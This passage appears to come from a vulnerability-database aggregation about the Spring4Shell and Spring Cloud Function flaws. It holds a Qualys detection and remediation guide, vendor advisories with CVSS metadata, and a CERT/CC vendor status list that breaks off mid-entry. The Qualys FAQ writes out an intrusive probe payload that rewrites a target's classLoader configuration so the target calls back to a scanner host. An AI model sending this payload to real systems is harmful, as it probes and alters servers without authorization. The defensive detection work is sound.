Dashboard](<https://2jws2s3y97dy39441y2lgm98-wpengine.netdna-ssl.com/wp-content/uploads/2022/04/QLYS-Spring4Shell-Dashboard.zip>)](<https://blog.qualys.com/wp-content/uploads/2022/04/QLYS-Spring4Shell-Dashboard-2.zip>)[Download](<https://blog.qualys.com/wp-content/uploads/2022/04/QLYS-Spring4Shell-Dashboard-2.zip>)\n\n\n\n### Detect Spring4Shell Vulnerabilities in Running Containers & Images\n\nIf you run Apache Tomcat in containers, then it is critical that you check for Spring4Shell vulnerabilities, given the high severity of this potential exploit. Qualys Container Security offers multiple methods to help you detect Spring4Shell vulnerabilities in your container environment. The Container Security sensor checks both running containers and container images for the following vulnerabilities: \n\n * QID 376506(CVE-2022-22965) \n * QID 376508 (CVE-2022-22963 \n\nTo detect vulnerabilities in running containers, you must deploy the Container Security sensor in \u201cGeneral\u201d mode on the hosts running the containers. You can view the containers impacted by these vulnerabilities by navigating to the \u201cContainer Security\u201d application, then selecting the \u201cAssets-> Container\u201d tab, and using the following QQL query: \n\nvulnerabilities.qid:376506 or vulnerabilities.qid:376508 \n\n\n\nTo view details of the vulnerability, you can click on the vulnerable container and navigate to the \u201cVulnerabilities\u201d tab as shown in the screenshot below: \n\n\n\nIn addition to scanning running containers, Qualys recommends that you scan container images for Spring4Shell vulnerabilities. Catching and remediating Spring4Shell vulnerabilities in container images will eliminate exposure to the vulnerabilities when the image is instantiated as a container. \n\nTo view all the impacted images, navigate to the Qualys Container Security app, then select the \u201cAssets -> Images\u201d tab, and use the following QQL query: \n \n \n vulnerabilities.qid:376506 or vulnerabilities.qid:376508 \n\n\n\nTo view details of the vulnerability, you can click on the image and navigate to the \u201cVulnerabilities\u201d tab as shown in the screenshot below: \n\n\n\nQualys Container Security offers a comprehensive solution for detecting vulnerabilities, including Spring4Shell, across the entire lifecycle of the container from build time to runtime. \n\n### Remediate Spring4Shell Using Qualys Patch Management\n\nThe recommended way to patch this vulnerability is by updating to Spring Framework 5.3.18 and 5.2.20 or greater. Customers can use Patch Management\u2019s install software action to download and script the upgrade. Note that customers can create a patch job that only includes the install/script action, in such case there is no need to add patches to the job. Alternatively, if upgrading the Spring Framework is not possible, customers can use Qualys patch management to patch Tomcat to versions: 10.0.20, 9.0.62, or 8.5.78. Tomcat patches are supported out-of-the-box and require no special configuration. \n\n\n\n### Detect Spring4Shell Exploitation Attempts with Qualys XDR\n\nAn important last step in confronting Spring4Shell is to ensure that your organization has not already been targeted by attacks that exploit this vulnerability. \n\nThe Qualys Threat Intelligence team has released the following XDR correlation rules for detecting Remote Code Execution exploitation attempts. These rules are available today via your TAM for quick import and implementation and will be delivered as part of a rule pack in a future XDR release. \n\nT1190 - [Palo Alto Firewall] Spring4Shell RCE Vulnerability Exploitation Detected (CVE-2022-22965) \n\nT1190 - [Check Point IPS] Spring4Shell RCE Vulnerability Exploitation Detected (CVE-2022-22965) \n\nT1190 - [Fortinet Firewall] Spring4Shell RCE Vulnerability Exploitation Detected (CVE-2022-22965) \n\nT1190 - [Trend Micro TippingPoint IPS] Spring4Shell RCE Vulnerability Exploitation Detected (CVE-2022-22965) \n\n### FAQ: \n\n#### Is this vulnerability related to CVE-2022-22963? \n\nThere is some confusion about this zero-day vulnerability due to another unrelated Spring vulnerability (CVE-2022-22963) published on March 29, 2022. This vulnerability, CVE-2022-22963, impacts Spring Cloud Function, which is not in Spring Framework. \n\nQIDs 376508 and 730418 are available to address this CVE. \n\n#### What is the detection logic for QID 376506: Spring Core Remote Code Execution (RCE) Vulnerability (Spring4Shell)? \n\nQID 376506 is an authenticated check currently supported on Linux and Windows Operating Systems. \n\nOn Linux systems, detection checks if system has java 9 or later versions and executes \u2018locate\u2019 and \u2018 ls -l /proc/*/fd \u2018 to checks if one of the \u2018 spring-webmvc-*.jar \u2018, \u2018 spring-webflux*.jar \u2018 or \u2018 spring-boot.*jar \u2018 present on the system. \n\nOn Windows system, detection checks vulnerable instances of Spring via WMI to check spring-webmvc, spring-webflux and spring-boot are included in the running processes via command-line with JDK9 or higher. \n\nContainer Sensor image scanning uses find command to check for spring-webmvc, spring-webflux and spring-boot jars from .war files along with JDK9 or higher. \n\n#### Under what situations would QID 376506 not detect the vulnerability? \n\nQID 376506 might not be detected if access to /proc/*/fd is restricted or if the spring-core or spring-beans file is embedded inside other binaries, such as jar, war, etc. \n\nFurthermore, this QID might not be detected if the locate command is not available on the target. Targets on Java versions less than 9 are not vulnerable. \n\n#### What is the detection logic for QID 730416 (unauthenticated check)? \n\nQID 730416 is a remote unauthenticated check. It sends a specially crafted HTTP GET request to the remote web application and tries to get a callback on scanner using payload: \n \n \n \"?class.module.classLoader.resources.context.configFile=http://<Scanner_IP>:<Random_port>&class.module.classLoader.resources.context.configFile\" \n\nQID 730416 is an intrusive check. The payload used in the detection may in some cases change the Spring configuration on the target application which can hamper the application's logging capabilities. \n\n#### Under what conditions would QID 730416 not work? \n\nQID 730416 will not work if the following conditions are present: \n\n * "Do not exclude Intrusive checks" is not enabled in Scan Option Profile \n * This QID only checks for the vulnerability at root URI. If the vulnerability lies in non-root URIs, the QID would not be detected. \n * If communication from host to scanner is blocked. \n * The payload gets blocked by a firewall, IPS, etc. that is between the host and the scanner. \n\n### Updates\n\n**Update \u2013 April **7 \n\nA new QID (730416) was added to address CVE-2022-22963 under \u201cQID Coverage\u201d. \n\n**Update \u2013 April 6** \n\nSeveral new QIDs to address CVE-2022-22963 are now available under \u201cQID Coverage\u201d. The CSAM section has been expanded. \n\n**U****pdate \u2013 April 5****** \n\nGuidance added for detection using Qualys CSAM, VMDR and XDR, and tracking remediation progress using Unified Dashboards and Patch Management. \n\n**Update \u2013 April 4**** ** \n\nQualys has added a [scan utility](<https://github.com/Qualys/spring4scanwin>) for Windows and [scan utility](<https://github.com/Qualys/spring4scanlinux>) for Linux to scan the entire hard drive(s), including archives (and nested JARs,) that indicate the Java application contains a vulnerable Spring Framework or Spring Cloud library. \n\n**Update \u2013 April 1** \n\nNew QIDs to address CVE-2022-22963 are now available. See section \u201cQID Coverage\u201d section. \n\n**Update \u2013 March 31** \n\nCVE-2022-22965 is now assigned to this vulnerability. Qualys Research Team has released QIDs as of March 30 and will keep updating those QIDs as new information is available.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T09:00:00", "type": "qualysblog", "title": "Spring Framework Zero-Day Remote Code Execution (Spring4Shell) Vulnerability", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-03-31T09:00:00", "id": "QUALYSBLOG:6DE7FC733B2FD13EE70756266FF191D0", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "fortinet": [{"lastseen": "2022-04-28T11:28:54", "description": "Two distinct spring project vulnerabilities where released recently with critical CVSS score and classified as zero-Day attacks. \nThe two vulnerabilities are currently known as : \nCVE-2022-22965 or Spring4Shell: \nA Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it. \nhttps://tanzu.vmware.com/security/cve-2022-22965 \n[https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html?fbclid=IwAR2fXxKQjG9vnJiOaXyZ1N_Ypx91TOzO6f48qGZRfKRzinYtD5nUCIptIjg&m=1](<https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html?fbclid=IwAR2fXxKQjG9vnJiOaXyZ1N_Ypx91TOzO6f48qGZRfKRzinYtD5nUCIptIjg&m=1>) \nCVE-2022-22963: \nIn Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions, when using routing \nfunctionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that \nmay result in access to local resources. \n<https://tanzu.vmware.com/security/cve-2022-22963>\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-01T00:00:00", "type": "fortinet", "title": "CVE-2022-22965 and CVE-2022-22963 vulnerabilities", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-04-01T00:00:00", "id": "FG-IR-22-072", "href": "https://www.fortiguard.com/psirt/FG-IR-22-072", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "paloalto": [{"lastseen": "2022-04-25T23:29:53", "description": "The Palo Alto Networks Product Security Assurance team has completed its evaluation of the Spring Cloud Function vulnerability CVE-2022-22963 and Spring Core vulnerability CVE-2022-22965 for all products and services. All Palo Alto Networks cloud services with possible impact have been mitigated and remediated.\n\nThe following products and services are not impacted by these Spring vulnerabilities: AutoFocus, Bridgecrew, Cortex Data Lake, Cortex XDR agent, Cortex Xpanse, Cortex XSOAR, Enterprise Data Loss Prevention, Exact Data Matching (EDM) CLI, Expanse, Expedition Migration Tool, GlobalProtect app, IoT Security, Okyo Garde, Palo Alto Networks App for Splunk, PAN-OS hardware and virtual firewalls and Panorama appliances, Prisma Cloud, Prisma Cloud Compute, Prisma SD-WAN (CloudGenix), Prisma SD-WAN ION, SaaS Security, User-ID Agent, WildFire Appliance (WF-500), and WildFire Cloud.\n\n**Work around:**\nNo workarounds or mitigations are required for Palo Alto Networks products at this time.\n\nCustomers with a Threat Prevention subscription can block the attack traffic related to these vulnerabilities by enabling Threat IDs 92393, 92394, and 83239 for CVE-2022-22965 and Threat ID 92389 for CVE-2022-22963.\n\nSee https://unit42.paloaltonetworks.com/cve-2022-22965-springshell/ for more details on Palo Alto Networks product capabilities to protect against attacks that exploit this issue.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T02:30:00", "type": "paloalto", "title": "Informational: Impact of Spring Vulnerabilities CVE-2022-22963 and CVE-2022-22965", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-03-31T02:30:00", "id": "PA-CVE-2022-22963", "href": "https://securityadvisories.paloaltonetworks.com/CVE-2022-22963", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cisa": [{"lastseen": "2022-04-07T11:27:17", "description": "Spring by VMWare has released Spring Cloud Function versions 3.1.7 and 3.2.3 to address remote code execution (RCE) vulnerability CVE-2022-22963 as well as Spring Framework versions 5.3.18 and 5.2.20 to address RCE vulnerability CVE-2022-22965, known as \u201cSpring4Shell.\u201d A remote attacker could exploit these vulnerabilities to take control of an affected system.\n\nAccording to VMware, the Spring4Shell vulnerability bypasses the patch for [CVE-2010-1622](<https://nvd.nist.gov/vuln/detail/CVE-2010-1622>), causing CVE-2010-1622 to become exploitable again. The bypass of the patch can occur because Java Development Kit (JDK) versions 9 and later provide two sandbox restriction methods, providing a path to exploit CVE-2010-1622 (JDK versions before 9 only provide one sandbox restriction method).\n\nCISA encourages users and administrators to immediately apply the necessary updates in the Spring Blog posts that provide the [Spring Cloud Function updates addressing CVE-2022-22963](<https://spring.io/blog/2022/03/29/cve-report-published-for-spring-cloud-function>) and the [Spring Framework updates addressing CVE-2022-22965](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>). CISA also recommends reviewing VMWare Tanzu Vulnerability Report [CVE-2022-22965: Spring Framework RCE via Data Binding on JDK 9+](<https://tanzu.vmware.com/security/cve-2022-22965>) and CERT Coordination Center (CERT/CC) Vulnerability Note [VU #970766](<https://www.kb.cert.org/vuls/id/970766>) for more information. \n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2022/04/01/spring-releases-security-updates-addressing-spring4shell-and>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-01T00:00:00", "type": "cisa", "title": "Spring Releases Security Updates Addressing \"Spring4Shell\" and Spring Cloud Function Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1622", "CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-04-01T00:00:00", "id": "CISA:6CCB59AFE6C3747D79017EDD3CC21673", "href": "https://us-cert.cisa.gov/ncas/current-activity/2022/04/01/spring-releases-security-updates-addressing-spring4shell-and", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "f5": [{"lastseen": "2022-04-11T19:29:49", "description": " * Spring Framework RCE (Spring4Shell): [CVE-2022-22965](<https://www.cve.org/CVERecord?id=CVE-2022-22965>)\n\nA Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it.\n\n * Spring Framework DoS: [CVE-2022-22950](<https://www.cve.org/CVERecord?id=CVE-2022-22950>)\n\nn Spring Framework versions 5.3.0 - 5.3.16 and older unsupported versions, it is possible for a user to provide a specially crafted SpEL expression that may cause a denial of service condition.\n\n * Spring Cloud RCE: [CVE-2022-22963](<https://www.cve.org/CVERecord?id=CVE-2022-22963>)\n\nIn Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions, when using routing functionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that may result in remote code execution and access to local resources.\n\nImpact\n\nThere is no impact; F5 products and services and NGINX products are not affected by this vulnerability.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T15:47:00", "type": "f5", "title": "Spring Framework (Spring4Shell) and Spring Cloud vulnerabilities CVE-2022-22965, CVE-2022-22950, and CVE-2022-22963", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22950", "CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-04-11T17:28:00", "id": "F5:K11510688", "href": "https://support.f5.com/csp/article/K11510688", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cert": [{"lastseen": "2022-05-19T17:43:45", "description": "### Overview\n\nThe Spring Framework insecurely handles PropertyDescriptor objects, which may allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system.\n\n### Description\n\nThe [Spring Framework](<https://spring.io/>) is a Java framework that can be used to create applications such as web applications. Due to improper handling of PropertyDescriptor objects used with data binding, Java applications written with Spring may allow for the execution of arbitrary code.\n\nExploit code that targets affected WAR-packaged Java code for tomcat servers is publicly available.\n\nNCSC-NL has a [list of products and their statuses](<https://github.com/NCSC-NL/spring4shell/blob/main/software/README.md>) with respect to this vulnerability.\n\n### Impact\n\nBy providing crafted data to a Spring Java application, such as a web application, an attacker may be able to execute arbitrary code with the privileges of the affected application. Depending on the application, exploitation may be possible by a remote attacker without requiring authentication.\n\n### Solution\n\n#### Apply an update\n\nThis issue is addressed in Spring Framework 5.3.18 and 5.2.20. Please see the [Spring Framework RCE Early Announcement](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>) for more details.\n\n### Acknowledgements\n\nThis issue was publicly disclosed by heige.\n\nThis document was written by Will Dormann\n\n### Vendor Information\n\n970766\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n### Blueriq __ Affected\n\nNotified: 2022-04-02 Updated: 2022-04-02 **CVE-2022-22965**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://www.blueriq.com/en/insights/measures-cve22950-22963-22965>\n\n### BMC Software __ Affected\n\nNotified: 2022-04-06 Updated: 2022-04-06 **CVE-2022-22965**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://bmcsites.force.com/casemgmt/sc_KnowledgeArticle?sfdcid=000395541>\n\n### Cisco __ Affected\n\nNotified: 2022-04-06 Updated: 2022-04-08\n\n**Statement Date: April 07, 2022**\n\n**CVE-2022-22965**| Affected \n---|--- \n \n#### Vendor Statement\n\nCisco is aware of the vulnerability identified by CVE ID CVE-2022-22950 and with the title \"Spring Expression DoS Vulnerability\". We are following our well-established process to investigate all aspects of the issue. If something is found that our customers need to be aware of and respond to, we will communicate via our established disclosure process.\n\n#### References\n\n * <https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-java-spring-rce-Zx9GUc67>\n\n### Dell __ Affected\n\nUpdated: 2022-04-20 **CVE-2022-22965**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * [https://www.dell.com/support/home/en-us/drivers/driversdetails?driverid=0vdcg&oscode=naa&productcode=wyse-wms](<https://www.dell.com/support/home/en-us/drivers/driversdetails?driverid=0vdcg&oscode=naa&productcode=wyse-wms>)\n\n### JAMF software __ Affected\n\nNotified: 2022-04-06 Updated: 2022-04-04 **CVE-2022-22965**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://community.jamf.com/t5/jamf-pro/spring4shell-vulnerability/td-p/262584>\n\n### NetApp __ Affected\n\nNotified: 2022-04-06 Updated: 2022-04-05 **CVE-2022-22965**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://security.netapp.com/advisory/ntap-20220401-0001/>\n\n### PTC __ Affected\n\nNotified: 2022-04-06 Updated: 2022-04-04 **CVE-2022-22965**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * [https://www.ptc.com/en/support/article/cs366379?language=en&posno=1&q=CVE-2022-22965&source=search](<https://www.ptc.com/en/support/article/cs366379?language=en&posno=1&q=CVE-2022-22965&source=search>)\n\n### SAP SE __ Affected\n\nUpdated: 2022-04-13 **CVE-2022-22965**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * [https://dam.sap.com/mac/app/e/pdf/preview/embed/ucQrx6G?ltr=a&rc=10](<https://dam.sap.com/mac/app/e/pdf/preview/embed/ucQrx6G?ltr=a&rc=10>)\n\n### Siemens __ Affected\n\nUpdated: 2022-04-27 **CVE-2022-22965**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://cert-portal.siemens.com/productcert/pdf/ssa-254054.pdf>\n\n### SolarWinds __ Affected\n\nNotified: 2022-04-02 Updated: 2022-04-06\n\n**Statement Date: April 04, 2022**\n\n**CVE-2022-22965**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received any reports of these issues from SolarWinds customers but are actively investigating. The following SolarWinds product do utilize the Spring Framework, but have not yet been confirmed to be affected by this issue: \u2022 Security Event Manager (SEM) \u2022 Database Performance Analyzer (DPA) \u2022 Web Help Desk (WHD) While we have not seen or received reports of SolarWinds products affected by this issue, for the protection of their environments, SolarWinds strongly recommends all customers disconnect their public-facing (internet-facing) installations of these SolarWinds products (SEM, DPA, and WHD) from the internet.\n\n#### References\n\n * <https://www.solarwinds.com/trust-center/security-advisories/spring4shell>\n\n### Spring __ Affected\n\nNotified: 2022-03-31 Updated: 2022-03-31\n\n**Statement Date: March 31, 2022**\n\n**CVE-2022-22965**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://tanzu.vmware.com/security/cve-2022-22965>\n * <https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>\n\n### VMware __ Affected\n\nNotified: 2022-04-06 Updated: 2022-04-03 **CVE-2022-22965**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://www.vmware.com/security/advisories/VMSA-2022-0010.html>\n\n### Aruba Networks __ Not Affected\n\nNotified: 2022-04-06 Updated: 2022-04-08\n\n**Statement Date: April 07, 2022**\n\n**CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nAruba Networks is aware of the issue and we have published a security advisory for our products at https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2022-006.txt\n\n### Check Point __ Not Affected\n\nUpdated: 2022-04-12 **CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * [https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk178605&src=securityAlerts](<https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk178605&src=securityAlerts>)\n\n### Commvault __ Not Affected\n\nNotified: 2022-04-06 Updated: 2022-04-05 **CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://documentation.commvault.com/v11/essential/146231_security_vulnerability_and_reporting.html#cv2022041-spring-framework>\n\n### Elastic __ Not Affected\n\nNotified: 2022-04-06 Updated: 2022-04-05 **CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://discuss.elastic.co/t/spring4shell-spring-framework-remote-code-execution-vulnerability/301229>\n\n### F5 Networks __ Not Affected\n\nNotified: 2022-04-01 Updated: 2022-04-20\n\n**Statement Date: April 15, 2022**\n\n**CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nF5 products and services and NGINX products are not affected by CVE-2022-22965.\n\n#### References\n\n * <https://support.f5.com/csp/article/K11510688>\n\n### Jenkins __ Not Affected\n\nNotified: 2022-04-06 Updated: 2022-04-02 **CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://www.jenkins.io/blog/2022/03/31/spring-rce-CVE-2022-22965/>\n\n### Micro Focus __ Not Affected\n\nNotified: 2022-04-06 Updated: 2022-04-05 **CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://portal.microfocus.com/s/article/KM000005107?language=en_US>\n\n### Okta Inc. __ Not Affected\n\nNotified: 2022-04-06 Updated: 2022-04-04 **CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://sec.okta.com/articles/2022/04/oktas-response-cve-2022-22965-spring4shell>\n\n### Palo Alto Networks __ Not Affected\n\nNotified: 2022-04-06 Updated: 2022-04-05 **CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://security.paloaltonetworks.com/CVE-2022-22963>\n\n### Pulse Secure __ Not Affected\n\nNotified: 2022-04-06 Updated: 2022-04-05 **CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB45126/?kA13Z000000L3sW>\n\n### Red Hat __ Not Affected\n\nNotified: 2022-04-06 Updated: 2022-04-08\n\n**Statement Date: April 08, 2022**\n\n**CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nNo Red Hat products are affected by CVE-2022-22963.\n\n### salesforce.com __ Not Affected\n\nNotified: 2022-04-06 Updated: 2022-04-05 **CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://kb.tableau.com/articles/Issue/Spring4Shell-CVE-2022-22963-and-CVE-2022-22965>\n\n### SonarSource __ Not Affected\n\nNotified: 2022-04-06 Updated: 2022-04-06 **CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://community.sonarsource.com/t/sonarqube-sonarcloud-and-spring4shell/60926>\n\n### Trend Micro __ Not Affected\n\nNotified: 2022-04-02 Updated: 2022-04-08\n\n**Statement Date: April 06, 2022**\n\n**CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://success.trendmicro.com/dcx/s/solution/000290730>\n\n### Ubiquiti __ Not Affected\n\nNotified: 2022-04-06 Updated: 2022-04-08\n\n**Statement Date: April 08, 2022**\n\n**CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nThe UniFi Network application only supports Java 8, which is not affected by this CVE. Still, the upcoming Network Version 7.2 update will upgrade to Spring Framework 5.3.18.\n\n#### References\n\n * <https://community.ui.com/releases/Statement-Regarding-Spring-CVE-2022-22965-2022-22950-and-2022-22963-001/19b2dc6f-4c36-436e-bd38-59ea0d6f1cb5>\n\n### Veritas Technologies __ Not Affected\n\nNotified: 2022-04-02 Updated: 2022-04-02 **CVE-2022-22965**| Not Affected 